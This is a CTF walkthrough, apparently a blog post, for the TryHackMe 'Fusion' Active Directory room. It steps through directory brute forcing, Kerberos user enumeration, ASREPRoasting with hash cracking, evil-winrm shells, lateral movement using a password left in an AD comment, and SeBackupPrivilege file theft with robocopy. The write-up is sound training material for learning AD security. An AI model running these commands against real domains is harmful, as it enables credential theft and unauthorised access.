Platform: TryHackMe
Difficulty: Easy
Reconnaissance
Nmap
nmap -sC -sV -A MACHINE-IP -oA nmap
The scan immediately tells us this is a Domain Controller — port 88 (Kerberos), 389/3268 (LDAP), and 5985 (WinRM) are all open, with the domain name fusion.corp leaking out of the LDAP banner. Port 80 is also open, which is less common on a DC and worth investigating separately.
| Port | Service |
|---|---|
| 53 | DNS (Simple DNS Plus) |
| 80 | HTTP (Microsoft IIS 10.0) |
| 88 | Kerberos |
| 389 / 3268 | LDAP — Domain: fusion.corp
|
| 445 | SMB (signing required) |
| 3389 | RDP |
| 5985 | WinRM |
DC hostname: Fusion-DC.fusion.corp
SMB Null Session
With SMB open and signing required, the first thing to check is whether null authentication is permitted — it occasionally gives us share access or user enumeration for free.
nxc smb MACHINE-IP -u '' -p ''
Null auth is accepted, but share enumeration comes back STATUS_ACCESS_DENIED. Dead end for now, but confirming the domain name (fusion.corp) is useful for later Kerberos attacks.
Web Enumeration (Port 80)
Browsing to port 80 shows a standard IIS-hosted "eBusiness" Bootstrap template. The Team page is immediately interesting - it lists employee full names with job titles, which in an AD environment often maps directly to domain usernames.
Directory Brute Force
Before digging into the HTML, it's worth checking whether IIS is exposing anything else on the filesystem.
ffuf -u http://MACHINE-IP/FUZZ -w /usr/share/wordlists/dirb/big.txt -ac
/backup/ returns a 301 and, crucially, has directory listing enabled. This is a misconfiguration — IIS should never serve directory listings in production, especially not from a path named backup.
employees.ods
Inside /backup/ is a single file: employees.ods. Opening it reveals a spreadsheet with employee names and their corresponding domain usernames. The naming convention is consistent - first initial followed by surname.
| Name | Username |
|---|---|
| Jhon Mickel | jmickel |
| Andrew Arnold | aarnold |
| Lellien Linda | llinda |
| Jhon Powel | jpowel |
| Dominique Vroslav | dvroslav |
| Thomas Jeffersonn | tjefferson |
| Nola Maurin | nmaurin |
| Mira Ladovic | mladovic |
| Larry Parker | lparker |
| Kay Garland | kgarland |
| Diana Pertersen | dpertersen |
This gives us a wordlist of 11 domain usernames. The next step is to validate which of these actually exist in AD and whether any have weak Kerberos configurations.
Initial Access — ASREPRoasting (lparker)
Kerberos User Enumeration
With a list of candidate usernames and port 88 open, we can probe the KDC directly without credentials using kerbrute. Unlike LDAP enumeration, this doesn't require a valid session - it simply checks whether the KDC responds differently to valid vs invalid usernames.
kerbrute userenum -d fusion.corp --dc MACHINE-IP usernames.txt
Only one account comes back as valid: lparker@fusion.corp. More importantly, kerbrute also flags that this account has Kerberos pre-authentication disabled — the condition required for ASREPRoasting.
ASREPRoast
When pre-authentication is disabled, the KDC will hand out an encrypted TGT to anyone who asks, without requiring proof of identity first. We can request it unauthenticated and attempt to crack it offline.
impacket-GetNPUsers fusion.corp/lparker -dc-ip MACHINE-IP -no-pass
The KDC returns a $krb5asrep$23$ hash encrypted with lparker's password. Save it to hash.txt.
Hash Cracking
The etype 23 (RC4) hash is crackable with a standard wordlist attack. RC4 is weak compared to AES-based Kerberos hashes, and many users still have it enabled for legacy compatibility reasons.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Password cracked: [REDACTED]
WinRM — lparker
With valid credentials and WinRM open on port 5985, we get a shell directly.
evil-winrm -i MACHINE-IP -u lparker -p '[REDACTED]'
*Evil-WinRM* PS C:\Users\lparker\Desktop> type flag.txt
THM{REDACTED}
Lateral Movement — jmurphy (Cleartext Password in AD Comment)
As lparker, the first thing to do is understand the AD landscape — who else is on this machine, and what groups are they in. net user shows only a handful of accounts: Administrator, Guest, krbtgt, lparker, and jmurphy.
Checking jmurphy's full domain profile reveals something alarming:
net user jmurphy /domain
The Comment field — a free-text attribute in AD that admins sometimes use for notes - contains the account's plaintext password. This is a well-known AD misconfiguration and a common finding in real engagements. The account also belongs to Backup Operators and Remote Management Users, making it far more valuable than lparker.
evil-winrm -i MACHINE-IP -u jmurphy -p '[REDACTED]'
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> type flag.txt
THM{REDACTED}
Privilege Escalation — SeBackupPrivilege → Administrator Flag
Before reaching for a typical privesc exploit, it's worth checking what privileges and group memberships this session actually has.
whoami /priv
whoami /groups
jmurphy holds SeBackupPrivilege and SeRestorePrivilege by virtue of being in Backup Operators. These two privileges are often overlooked but are extremely powerful - SeBackupPrivilege instructs the kernel to bypass DACL checks when opening files with the FILE_FLAG_BACKUP_SEMANTICS flag. In practical terms, it means we can read any file on the filesystem regardless of ACLs, including files owned by Administrator.
The cleanest way to exploit this via WinRM (where interactive tools like diskshadow fail due to the non-interactive shell) is robocopy with the /B flag, which invokes backup semantics internally.
mkdir C:\tmp
robocopy "C:\Users\Administrator\Desktop" "C:\tmp" "flag.txt" /B /COPY:DAT
type C:\tmp\flag.txt
THM{REDACTED}
Note:
diskshadowwas attempted for a VSS-based NTDS dump but exited immediately — it requires an interactive console, which WinRM doesn't provide. For the purposes of this room, direct file theft viarobocopy /Bis sufficient. In a real engagement,SeBackupPrivilegewould also allow dumping SAM/SYSTEM hives usingreg saveand extracting local credentials offline.
Summary
| Step | Technique | Result |
|---|---|---|
| IIS dir listing | Open /backup/ on IIS |
Leaked employees.ods with usernames |
| ASREPRoasting |
GetNPUsers + john
|
lparker credentials |
| WinRM | evil-winrm |
Shell as lparker, Flag 1 |
| AD enumeration | net user /domain |
Plaintext password in jmurphy Comment |
| WinRM | evil-winrm |
Shell as jmurphy, Flag 2 |
| SeBackupPrivilege | robocopy /B |
Admin flag read |
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port and service enumeration |
| ffuf | Web directory brute force |
| enum4linux-ng | SMB/LDAP enumeration |
| NetExec (nxc) | SMB null session check |
| kerbrute | Kerberos username enumeration |
| impacket-GetNPUsers | ASREPRoast TGT request |
| john | Hash cracking |
| evil-winrm | WinRM shell |
| robocopy | SeBackupPrivilege file theft |
Key Vulnerabilities
| # | Vulnerability | Impact |
|---|---|---|
| 1 | IIS directory listing exposes employees.ods
|
Username enumeration |
| 2 | ASREPRoasting on lparker (no pre-auth required) |
Credential theft |
| 3 | Plaintext password in AD user Comment field (jmurphy) |
Lateral movement |
| 4 |
jmurphy member of Backup Operators with SeBackupPrivilege
|
Admin file read via robocopy /B
|
Attack Chain
IIS /backup/ → employees.ods → username list
→ kerbrute userenum → lparker valid
→ GetNPUsers ASREPRoast → crack TGT hash (john)
→ evil-winrm as lparker → flag 1
→ net user jmurphy /domain → plaintext password in Comment
→ evil-winrm as jmurphy (Backup Operators) → flag 2
→ SeBackupPrivilege + robocopy /B → Admin flag
Top comments (0)